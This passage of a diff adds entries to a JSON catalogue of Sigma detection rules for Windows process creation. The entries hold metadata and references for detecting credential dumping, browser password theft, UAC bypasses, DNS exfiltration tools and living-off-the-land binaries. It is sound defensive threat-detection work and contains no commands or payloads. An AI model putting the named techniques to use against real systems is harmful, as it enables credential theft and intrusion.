backup or forensic investigation" + ], + "filename": "proc_creation_win_grabbing_sensitive_hives_via_reg.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_grabbing_sensitive_hives_via_reg.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" + ] + }, + "uuid": "fd877b94-9bb5-4191-bb25-d79cbd93c167", + "value": "Grabbing Sensitive Hives via Reg Utility" + }, + { + "description": "AdFind continues to be seen across majority of breaches. 
It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "meta": { + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "creation_date": "2021/02/02", + "falsepositive": [ + "Legitimate admin activity" + ], + "filename": "proc_creation_win_susp_adfind_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://www.joeware.net/freetools/tools/adfind/", + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_usage.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" + ] + }, + "uuid": "9a132afa-654e-11eb-ae93-0242ac130002", + "value": "AdFind Usage Detection" + }, + { + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hwp_exploits.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://en.wikipedia.org/wiki/Hangul_(word_processor)", + "https://twitter.com/cyberwar_15/status/1187287262054076416", + "https://blog.alyac.co.kr/1901", + 
"https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", + "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1203", + "attack.t1059.003", + "attack.g0032" + ] + }, + "uuid": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "value": "Suspicious HWP Sub Processes" + }, + { + "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", + "value": "UAC Bypass via Windows Firewall Snap-In Hijack" + }, + { + "description": "Detect use of WebBrowserPassView.exe", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_webbrowserpassview.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webbrowserpassview.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.003" + ] + }, + "uuid": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", + "value": "Launch WebBrowserPassView Executable" + }, + { + "description": "7-Zip through 21.07 on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process.", + "meta": { + "author": "frack113", + "creation_date": "2022/04/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_7zip_cve_2022_29072.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/kagancapar/status/1515219358234161153", + "https://github.com/kagancapar/CVE-2022-29072", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_cve_2022_29072.yml" + ], + "tags": [ + "cve.2022.29072" + ] + }, + "uuid": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "value": "Suspicious 7zip Subprocess" + }, + { + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_quarks_pwdump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", + "https://github.com/quarkslab/quarkspwdump", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "0685b176-c816-4837-8e7b-1216f346636b", + "value": "Quarks PwDump Usage" + }, + { + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/12", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_ssh_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ] + }, + "uuid": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "value": "Suspicious SSH Usage RDP Tunneling" + }, + { + "description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file", + "meta": { + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", + "creation_date": "2019/10/26", + "falsepositive": [ + "Legitimate use of debugging tools" + ], + "filename": "proc_creation_win_lolbin_cdb.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/", + "https://twitter.com/nas_bench/status/1534957360032120833", + "https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1218", + 
"attack.t1127" + ] + }, + "uuid": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", + "value": "WinDbg/CDB LOLBIN Usage" + }, + { + "description": "Shadow Copies creation using operating systems utilities, possible credential access", + "meta": { + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Legitimate administrator working with shadow copies, access for backup purposes" + ], + "filename": "proc_creation_win_shadow_copies_creation.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1003.002", + "attack.t1003.003" + ] + }, + "uuid": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", + "value": "Shadow Copies Creation Using Operating Systems Utilities" + }, + { + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_safetykatz.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/SafetyKatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_safetykatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "b1876533-4ed5-4a83-90f3-b8645840a413", + "value": "SafetyKatz Hack Tool" + }, + { + "description": "An adversary might use 
WMI to check if a certain Remote Service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_remote_service.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "09af397b-c5eb-4811-b2bb-08b3de464ebf", + "value": "WMI Reconnaissance List Remote Services" + }, + { + "description": "Detects Archer malware invocation via rundll32", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_crime_fireball.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100", + "https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_fireball.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + 
"attack.t1218.011" + ] + }, + "uuid": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", + "value": "Fireball Archer Install" + }, + { + "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", + "meta": { + "author": "Nik Seetharaman, frack113", + "creation_date": "2019/01/16", + "falsepositive": [ + "Legitimate MWC use (unlikely in modern enterprise environments)" + ], + "filename": "proc_creation_win_workflow_compiler.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_workflow_compiler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1127", + "attack.t1218" + ] + }, + "uuid": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", + "value": "Microsoft Workflow Compiler" + }, + { + "description": "Attackers can use print.exe for remote file copy", + "meta": { + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "creation_date": "2020/10/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_print.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Print/", + "https://twitter.com/Oddvarmoe/status/985518877076541440", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_print.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", + "value": "Abusing Print Executable" + }, + { + "description": "When configured with 
suitable command line arguments, w32tm can act as a delay mechanism", + "meta": { + "author": "frack113", + "creation_date": "2022/09/25", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_w32tm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md", + "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_w32tm.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1124" + ] + }, + "uuid": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "value": "Use of W32tm as Timer" + }, + { + "description": "Detects Elise backdoor acitivty as used by APT32", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/01/31", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_elise.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_elise.yml" + ], + "tags": [ + "attack.g0030", + "attack.g0050", + "attack.s0081", + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "value": "Elise Backdoor" + }, + { + "description": "Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/04/20", + "falsepositive": [ + "Should not be any false positives" + ], + "filename": "proc_creation_win_apt_lazarus_activity_apr21.yml", + "level": "high", + "logsource.category": 
"process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_apr21.yml" + ], + "tags": [ + "attack.g0032", + "attack.execution", + "attack.t1106" + ] + }, + "uuid": "4a12fa47-c735-4032-a214-6fab5b120670", + "value": "Lazarus Activity Apr21" + }, + { + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "meta": { + "author": "Cian Heasley, Florian Roth", + "creation_date": "2020/07/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_webshell_recon_detection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_recon_detection.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "f64e5c19-879c-4bae-b471-6d84c8339677", + "value": "Webshell Recon Detection Via CommandLine & Processes" + }, + { + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_copy_browser_data.yml", + "level": "medium", 
+ "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copy_browser_data.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.003" + ] + }, + "uuid": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", + "value": "Potential Browser Data Stealing" + }, + { + "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2020/09/26", + "falsepositive": [ + "This may have false positives on hosts where Virtualbox is legitimately being used for operations" + ], + "filename": "proc_creation_win_run_virtualbox.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1564/006/", + "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", + "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_virtualbox.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.006", + "attack.t1564" + ] + }, + "uuid": "bab049ca-7471-4828-9024-38279a4c04da", + "value": "Detect Virtualbox Driver Installation OR Starting Of VMs" + }, + { + "description": "Detects suspicious renamed SysInternals DebugView execution", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_renamed_debugview.yml", + "level": "high", + "logsource.category": 
"process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.epicturla.com/blog/sysinturla", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_debugview.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "value": "Renamed SysInternals Debug View" + }, + { + "description": "Detects suspicious mshta process patterns", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_mshta_pattern.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.echotrail.io/insights/search/mshta.exe", + "https://en.wikipedia.org/wiki/HTML_Application", + "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106" + ] + }, + "uuid": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", + "value": "Suspicious MSHTA Process Patterns" + }, + { + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", + "meta": { + "author": "frack113", + "creation_date": "2022/12/25", + "falsepositive": [ + "Legitimate use of the library" + ], + "filename": "proc_creation_win_ps_download_com_cradles.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57", + "https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ps_download_com_cradles.yml" + ], + "tags": "No established tags" + }, + "uuid": 
"02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", + "value": "Potential COM Objects Download Cradles Usage - Process Creation" + }, + { + "description": "Detects suspicious encoded character syntax often used for defense evasion", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_encoded_param.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1281103918693482496", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_param.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "e312efd0-35a1-407f-8439-b8d434b438a6", + "value": "PowerShell Encoded Character Syntax" + }, + { + "description": "Detects the use of 3proxy, a tiny free proxy server", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/13", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_3proxy_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/3proxy/3proxy", + "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ] + }, + "uuid": "f38a82d2-fba3-4781-b549-525efbec8506", + "value": "3Proxy Usage" + }, + { + "description": "Detects a suspicious curl process start the adds a file to a web request", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/03", + "falsepositive": [ + "Scripts created by developers and admins" + ], + "filename": "proc_creation_win_susp_curl_fileupload.yml", + "level": "medium", + 
"logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://curl.se/docs/manpage.html", + "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", + "https://twitter.com/d1r4c/status/1279042657508081664", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567", + "attack.t1105" + ] + }, + "uuid": "00bca14a-df4e-4649-9054-3f2aa676bc04", + "value": "Suspicious Curl File Upload" + }, + { + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_ieinstal.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "value": "UAC Bypass Using IEInstal - Process" + }, + { + "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", + "meta": { + "author": "frack113", + "creation_date": "2021/11/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_zipexec.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Tylous/ZipExec", + "https://twitter.com/SBousseaden/status/1451237393017839616", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zipexec.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ] + }, + "uuid": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", + "value": "Suspicious ZipExec Execution" + }, + { + "description": "Well-known DNS Exfiltration tools execution", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate usage of iodine or dnscat2 — DNS Exfiltration tools (unlikely)" + ], + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" + ] + }, + "uuid": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "value": "DNS Exfiltration and Tunneling Tools Execution" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/02/13",
+ "falsepositive": [
+ "Legitimate use"
+ ],
+ "filename": "proc_creation_win_gotoopener.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gotoopener.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1219"
+ ]
+ },
+ "uuid": "b6d98a4f-cef0-4abf-bbf6-24132854a83d",
+ "value": "Use of GoToAssist Remote Access Software"
+ },
+ {
+ "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/12/27",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_findstr_gpp_passwords.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1552.006"
+ ]
+ },
+ "uuid": "91a2c315-9ee6-4052-a853-6f6a8238f90d",
+ "value": "Findstr GPP Passwords"
+ },
+ {
+ "description": "Detects encoded base64 MZ header in the commandline",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/07/12",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_inline_base64_mz_header.yml",
+ "level": "high",
+
"logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_base64_mz_header.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "value": "Base64 MZ Header In CommandLine" + }, + { + "description": "Detects execution of REGSVR32.exe with DLL masquerading as image files", + "meta": { + "author": "frack113", + "creation_date": "2021/11/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_image.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", + "https://guides.lib.umich.edu/c.php?g=282942&p=1885348", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", + "value": "Suspicious Regsvr32 Execution With Image Extension" + }, + { + "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate use for administartive purposes. 
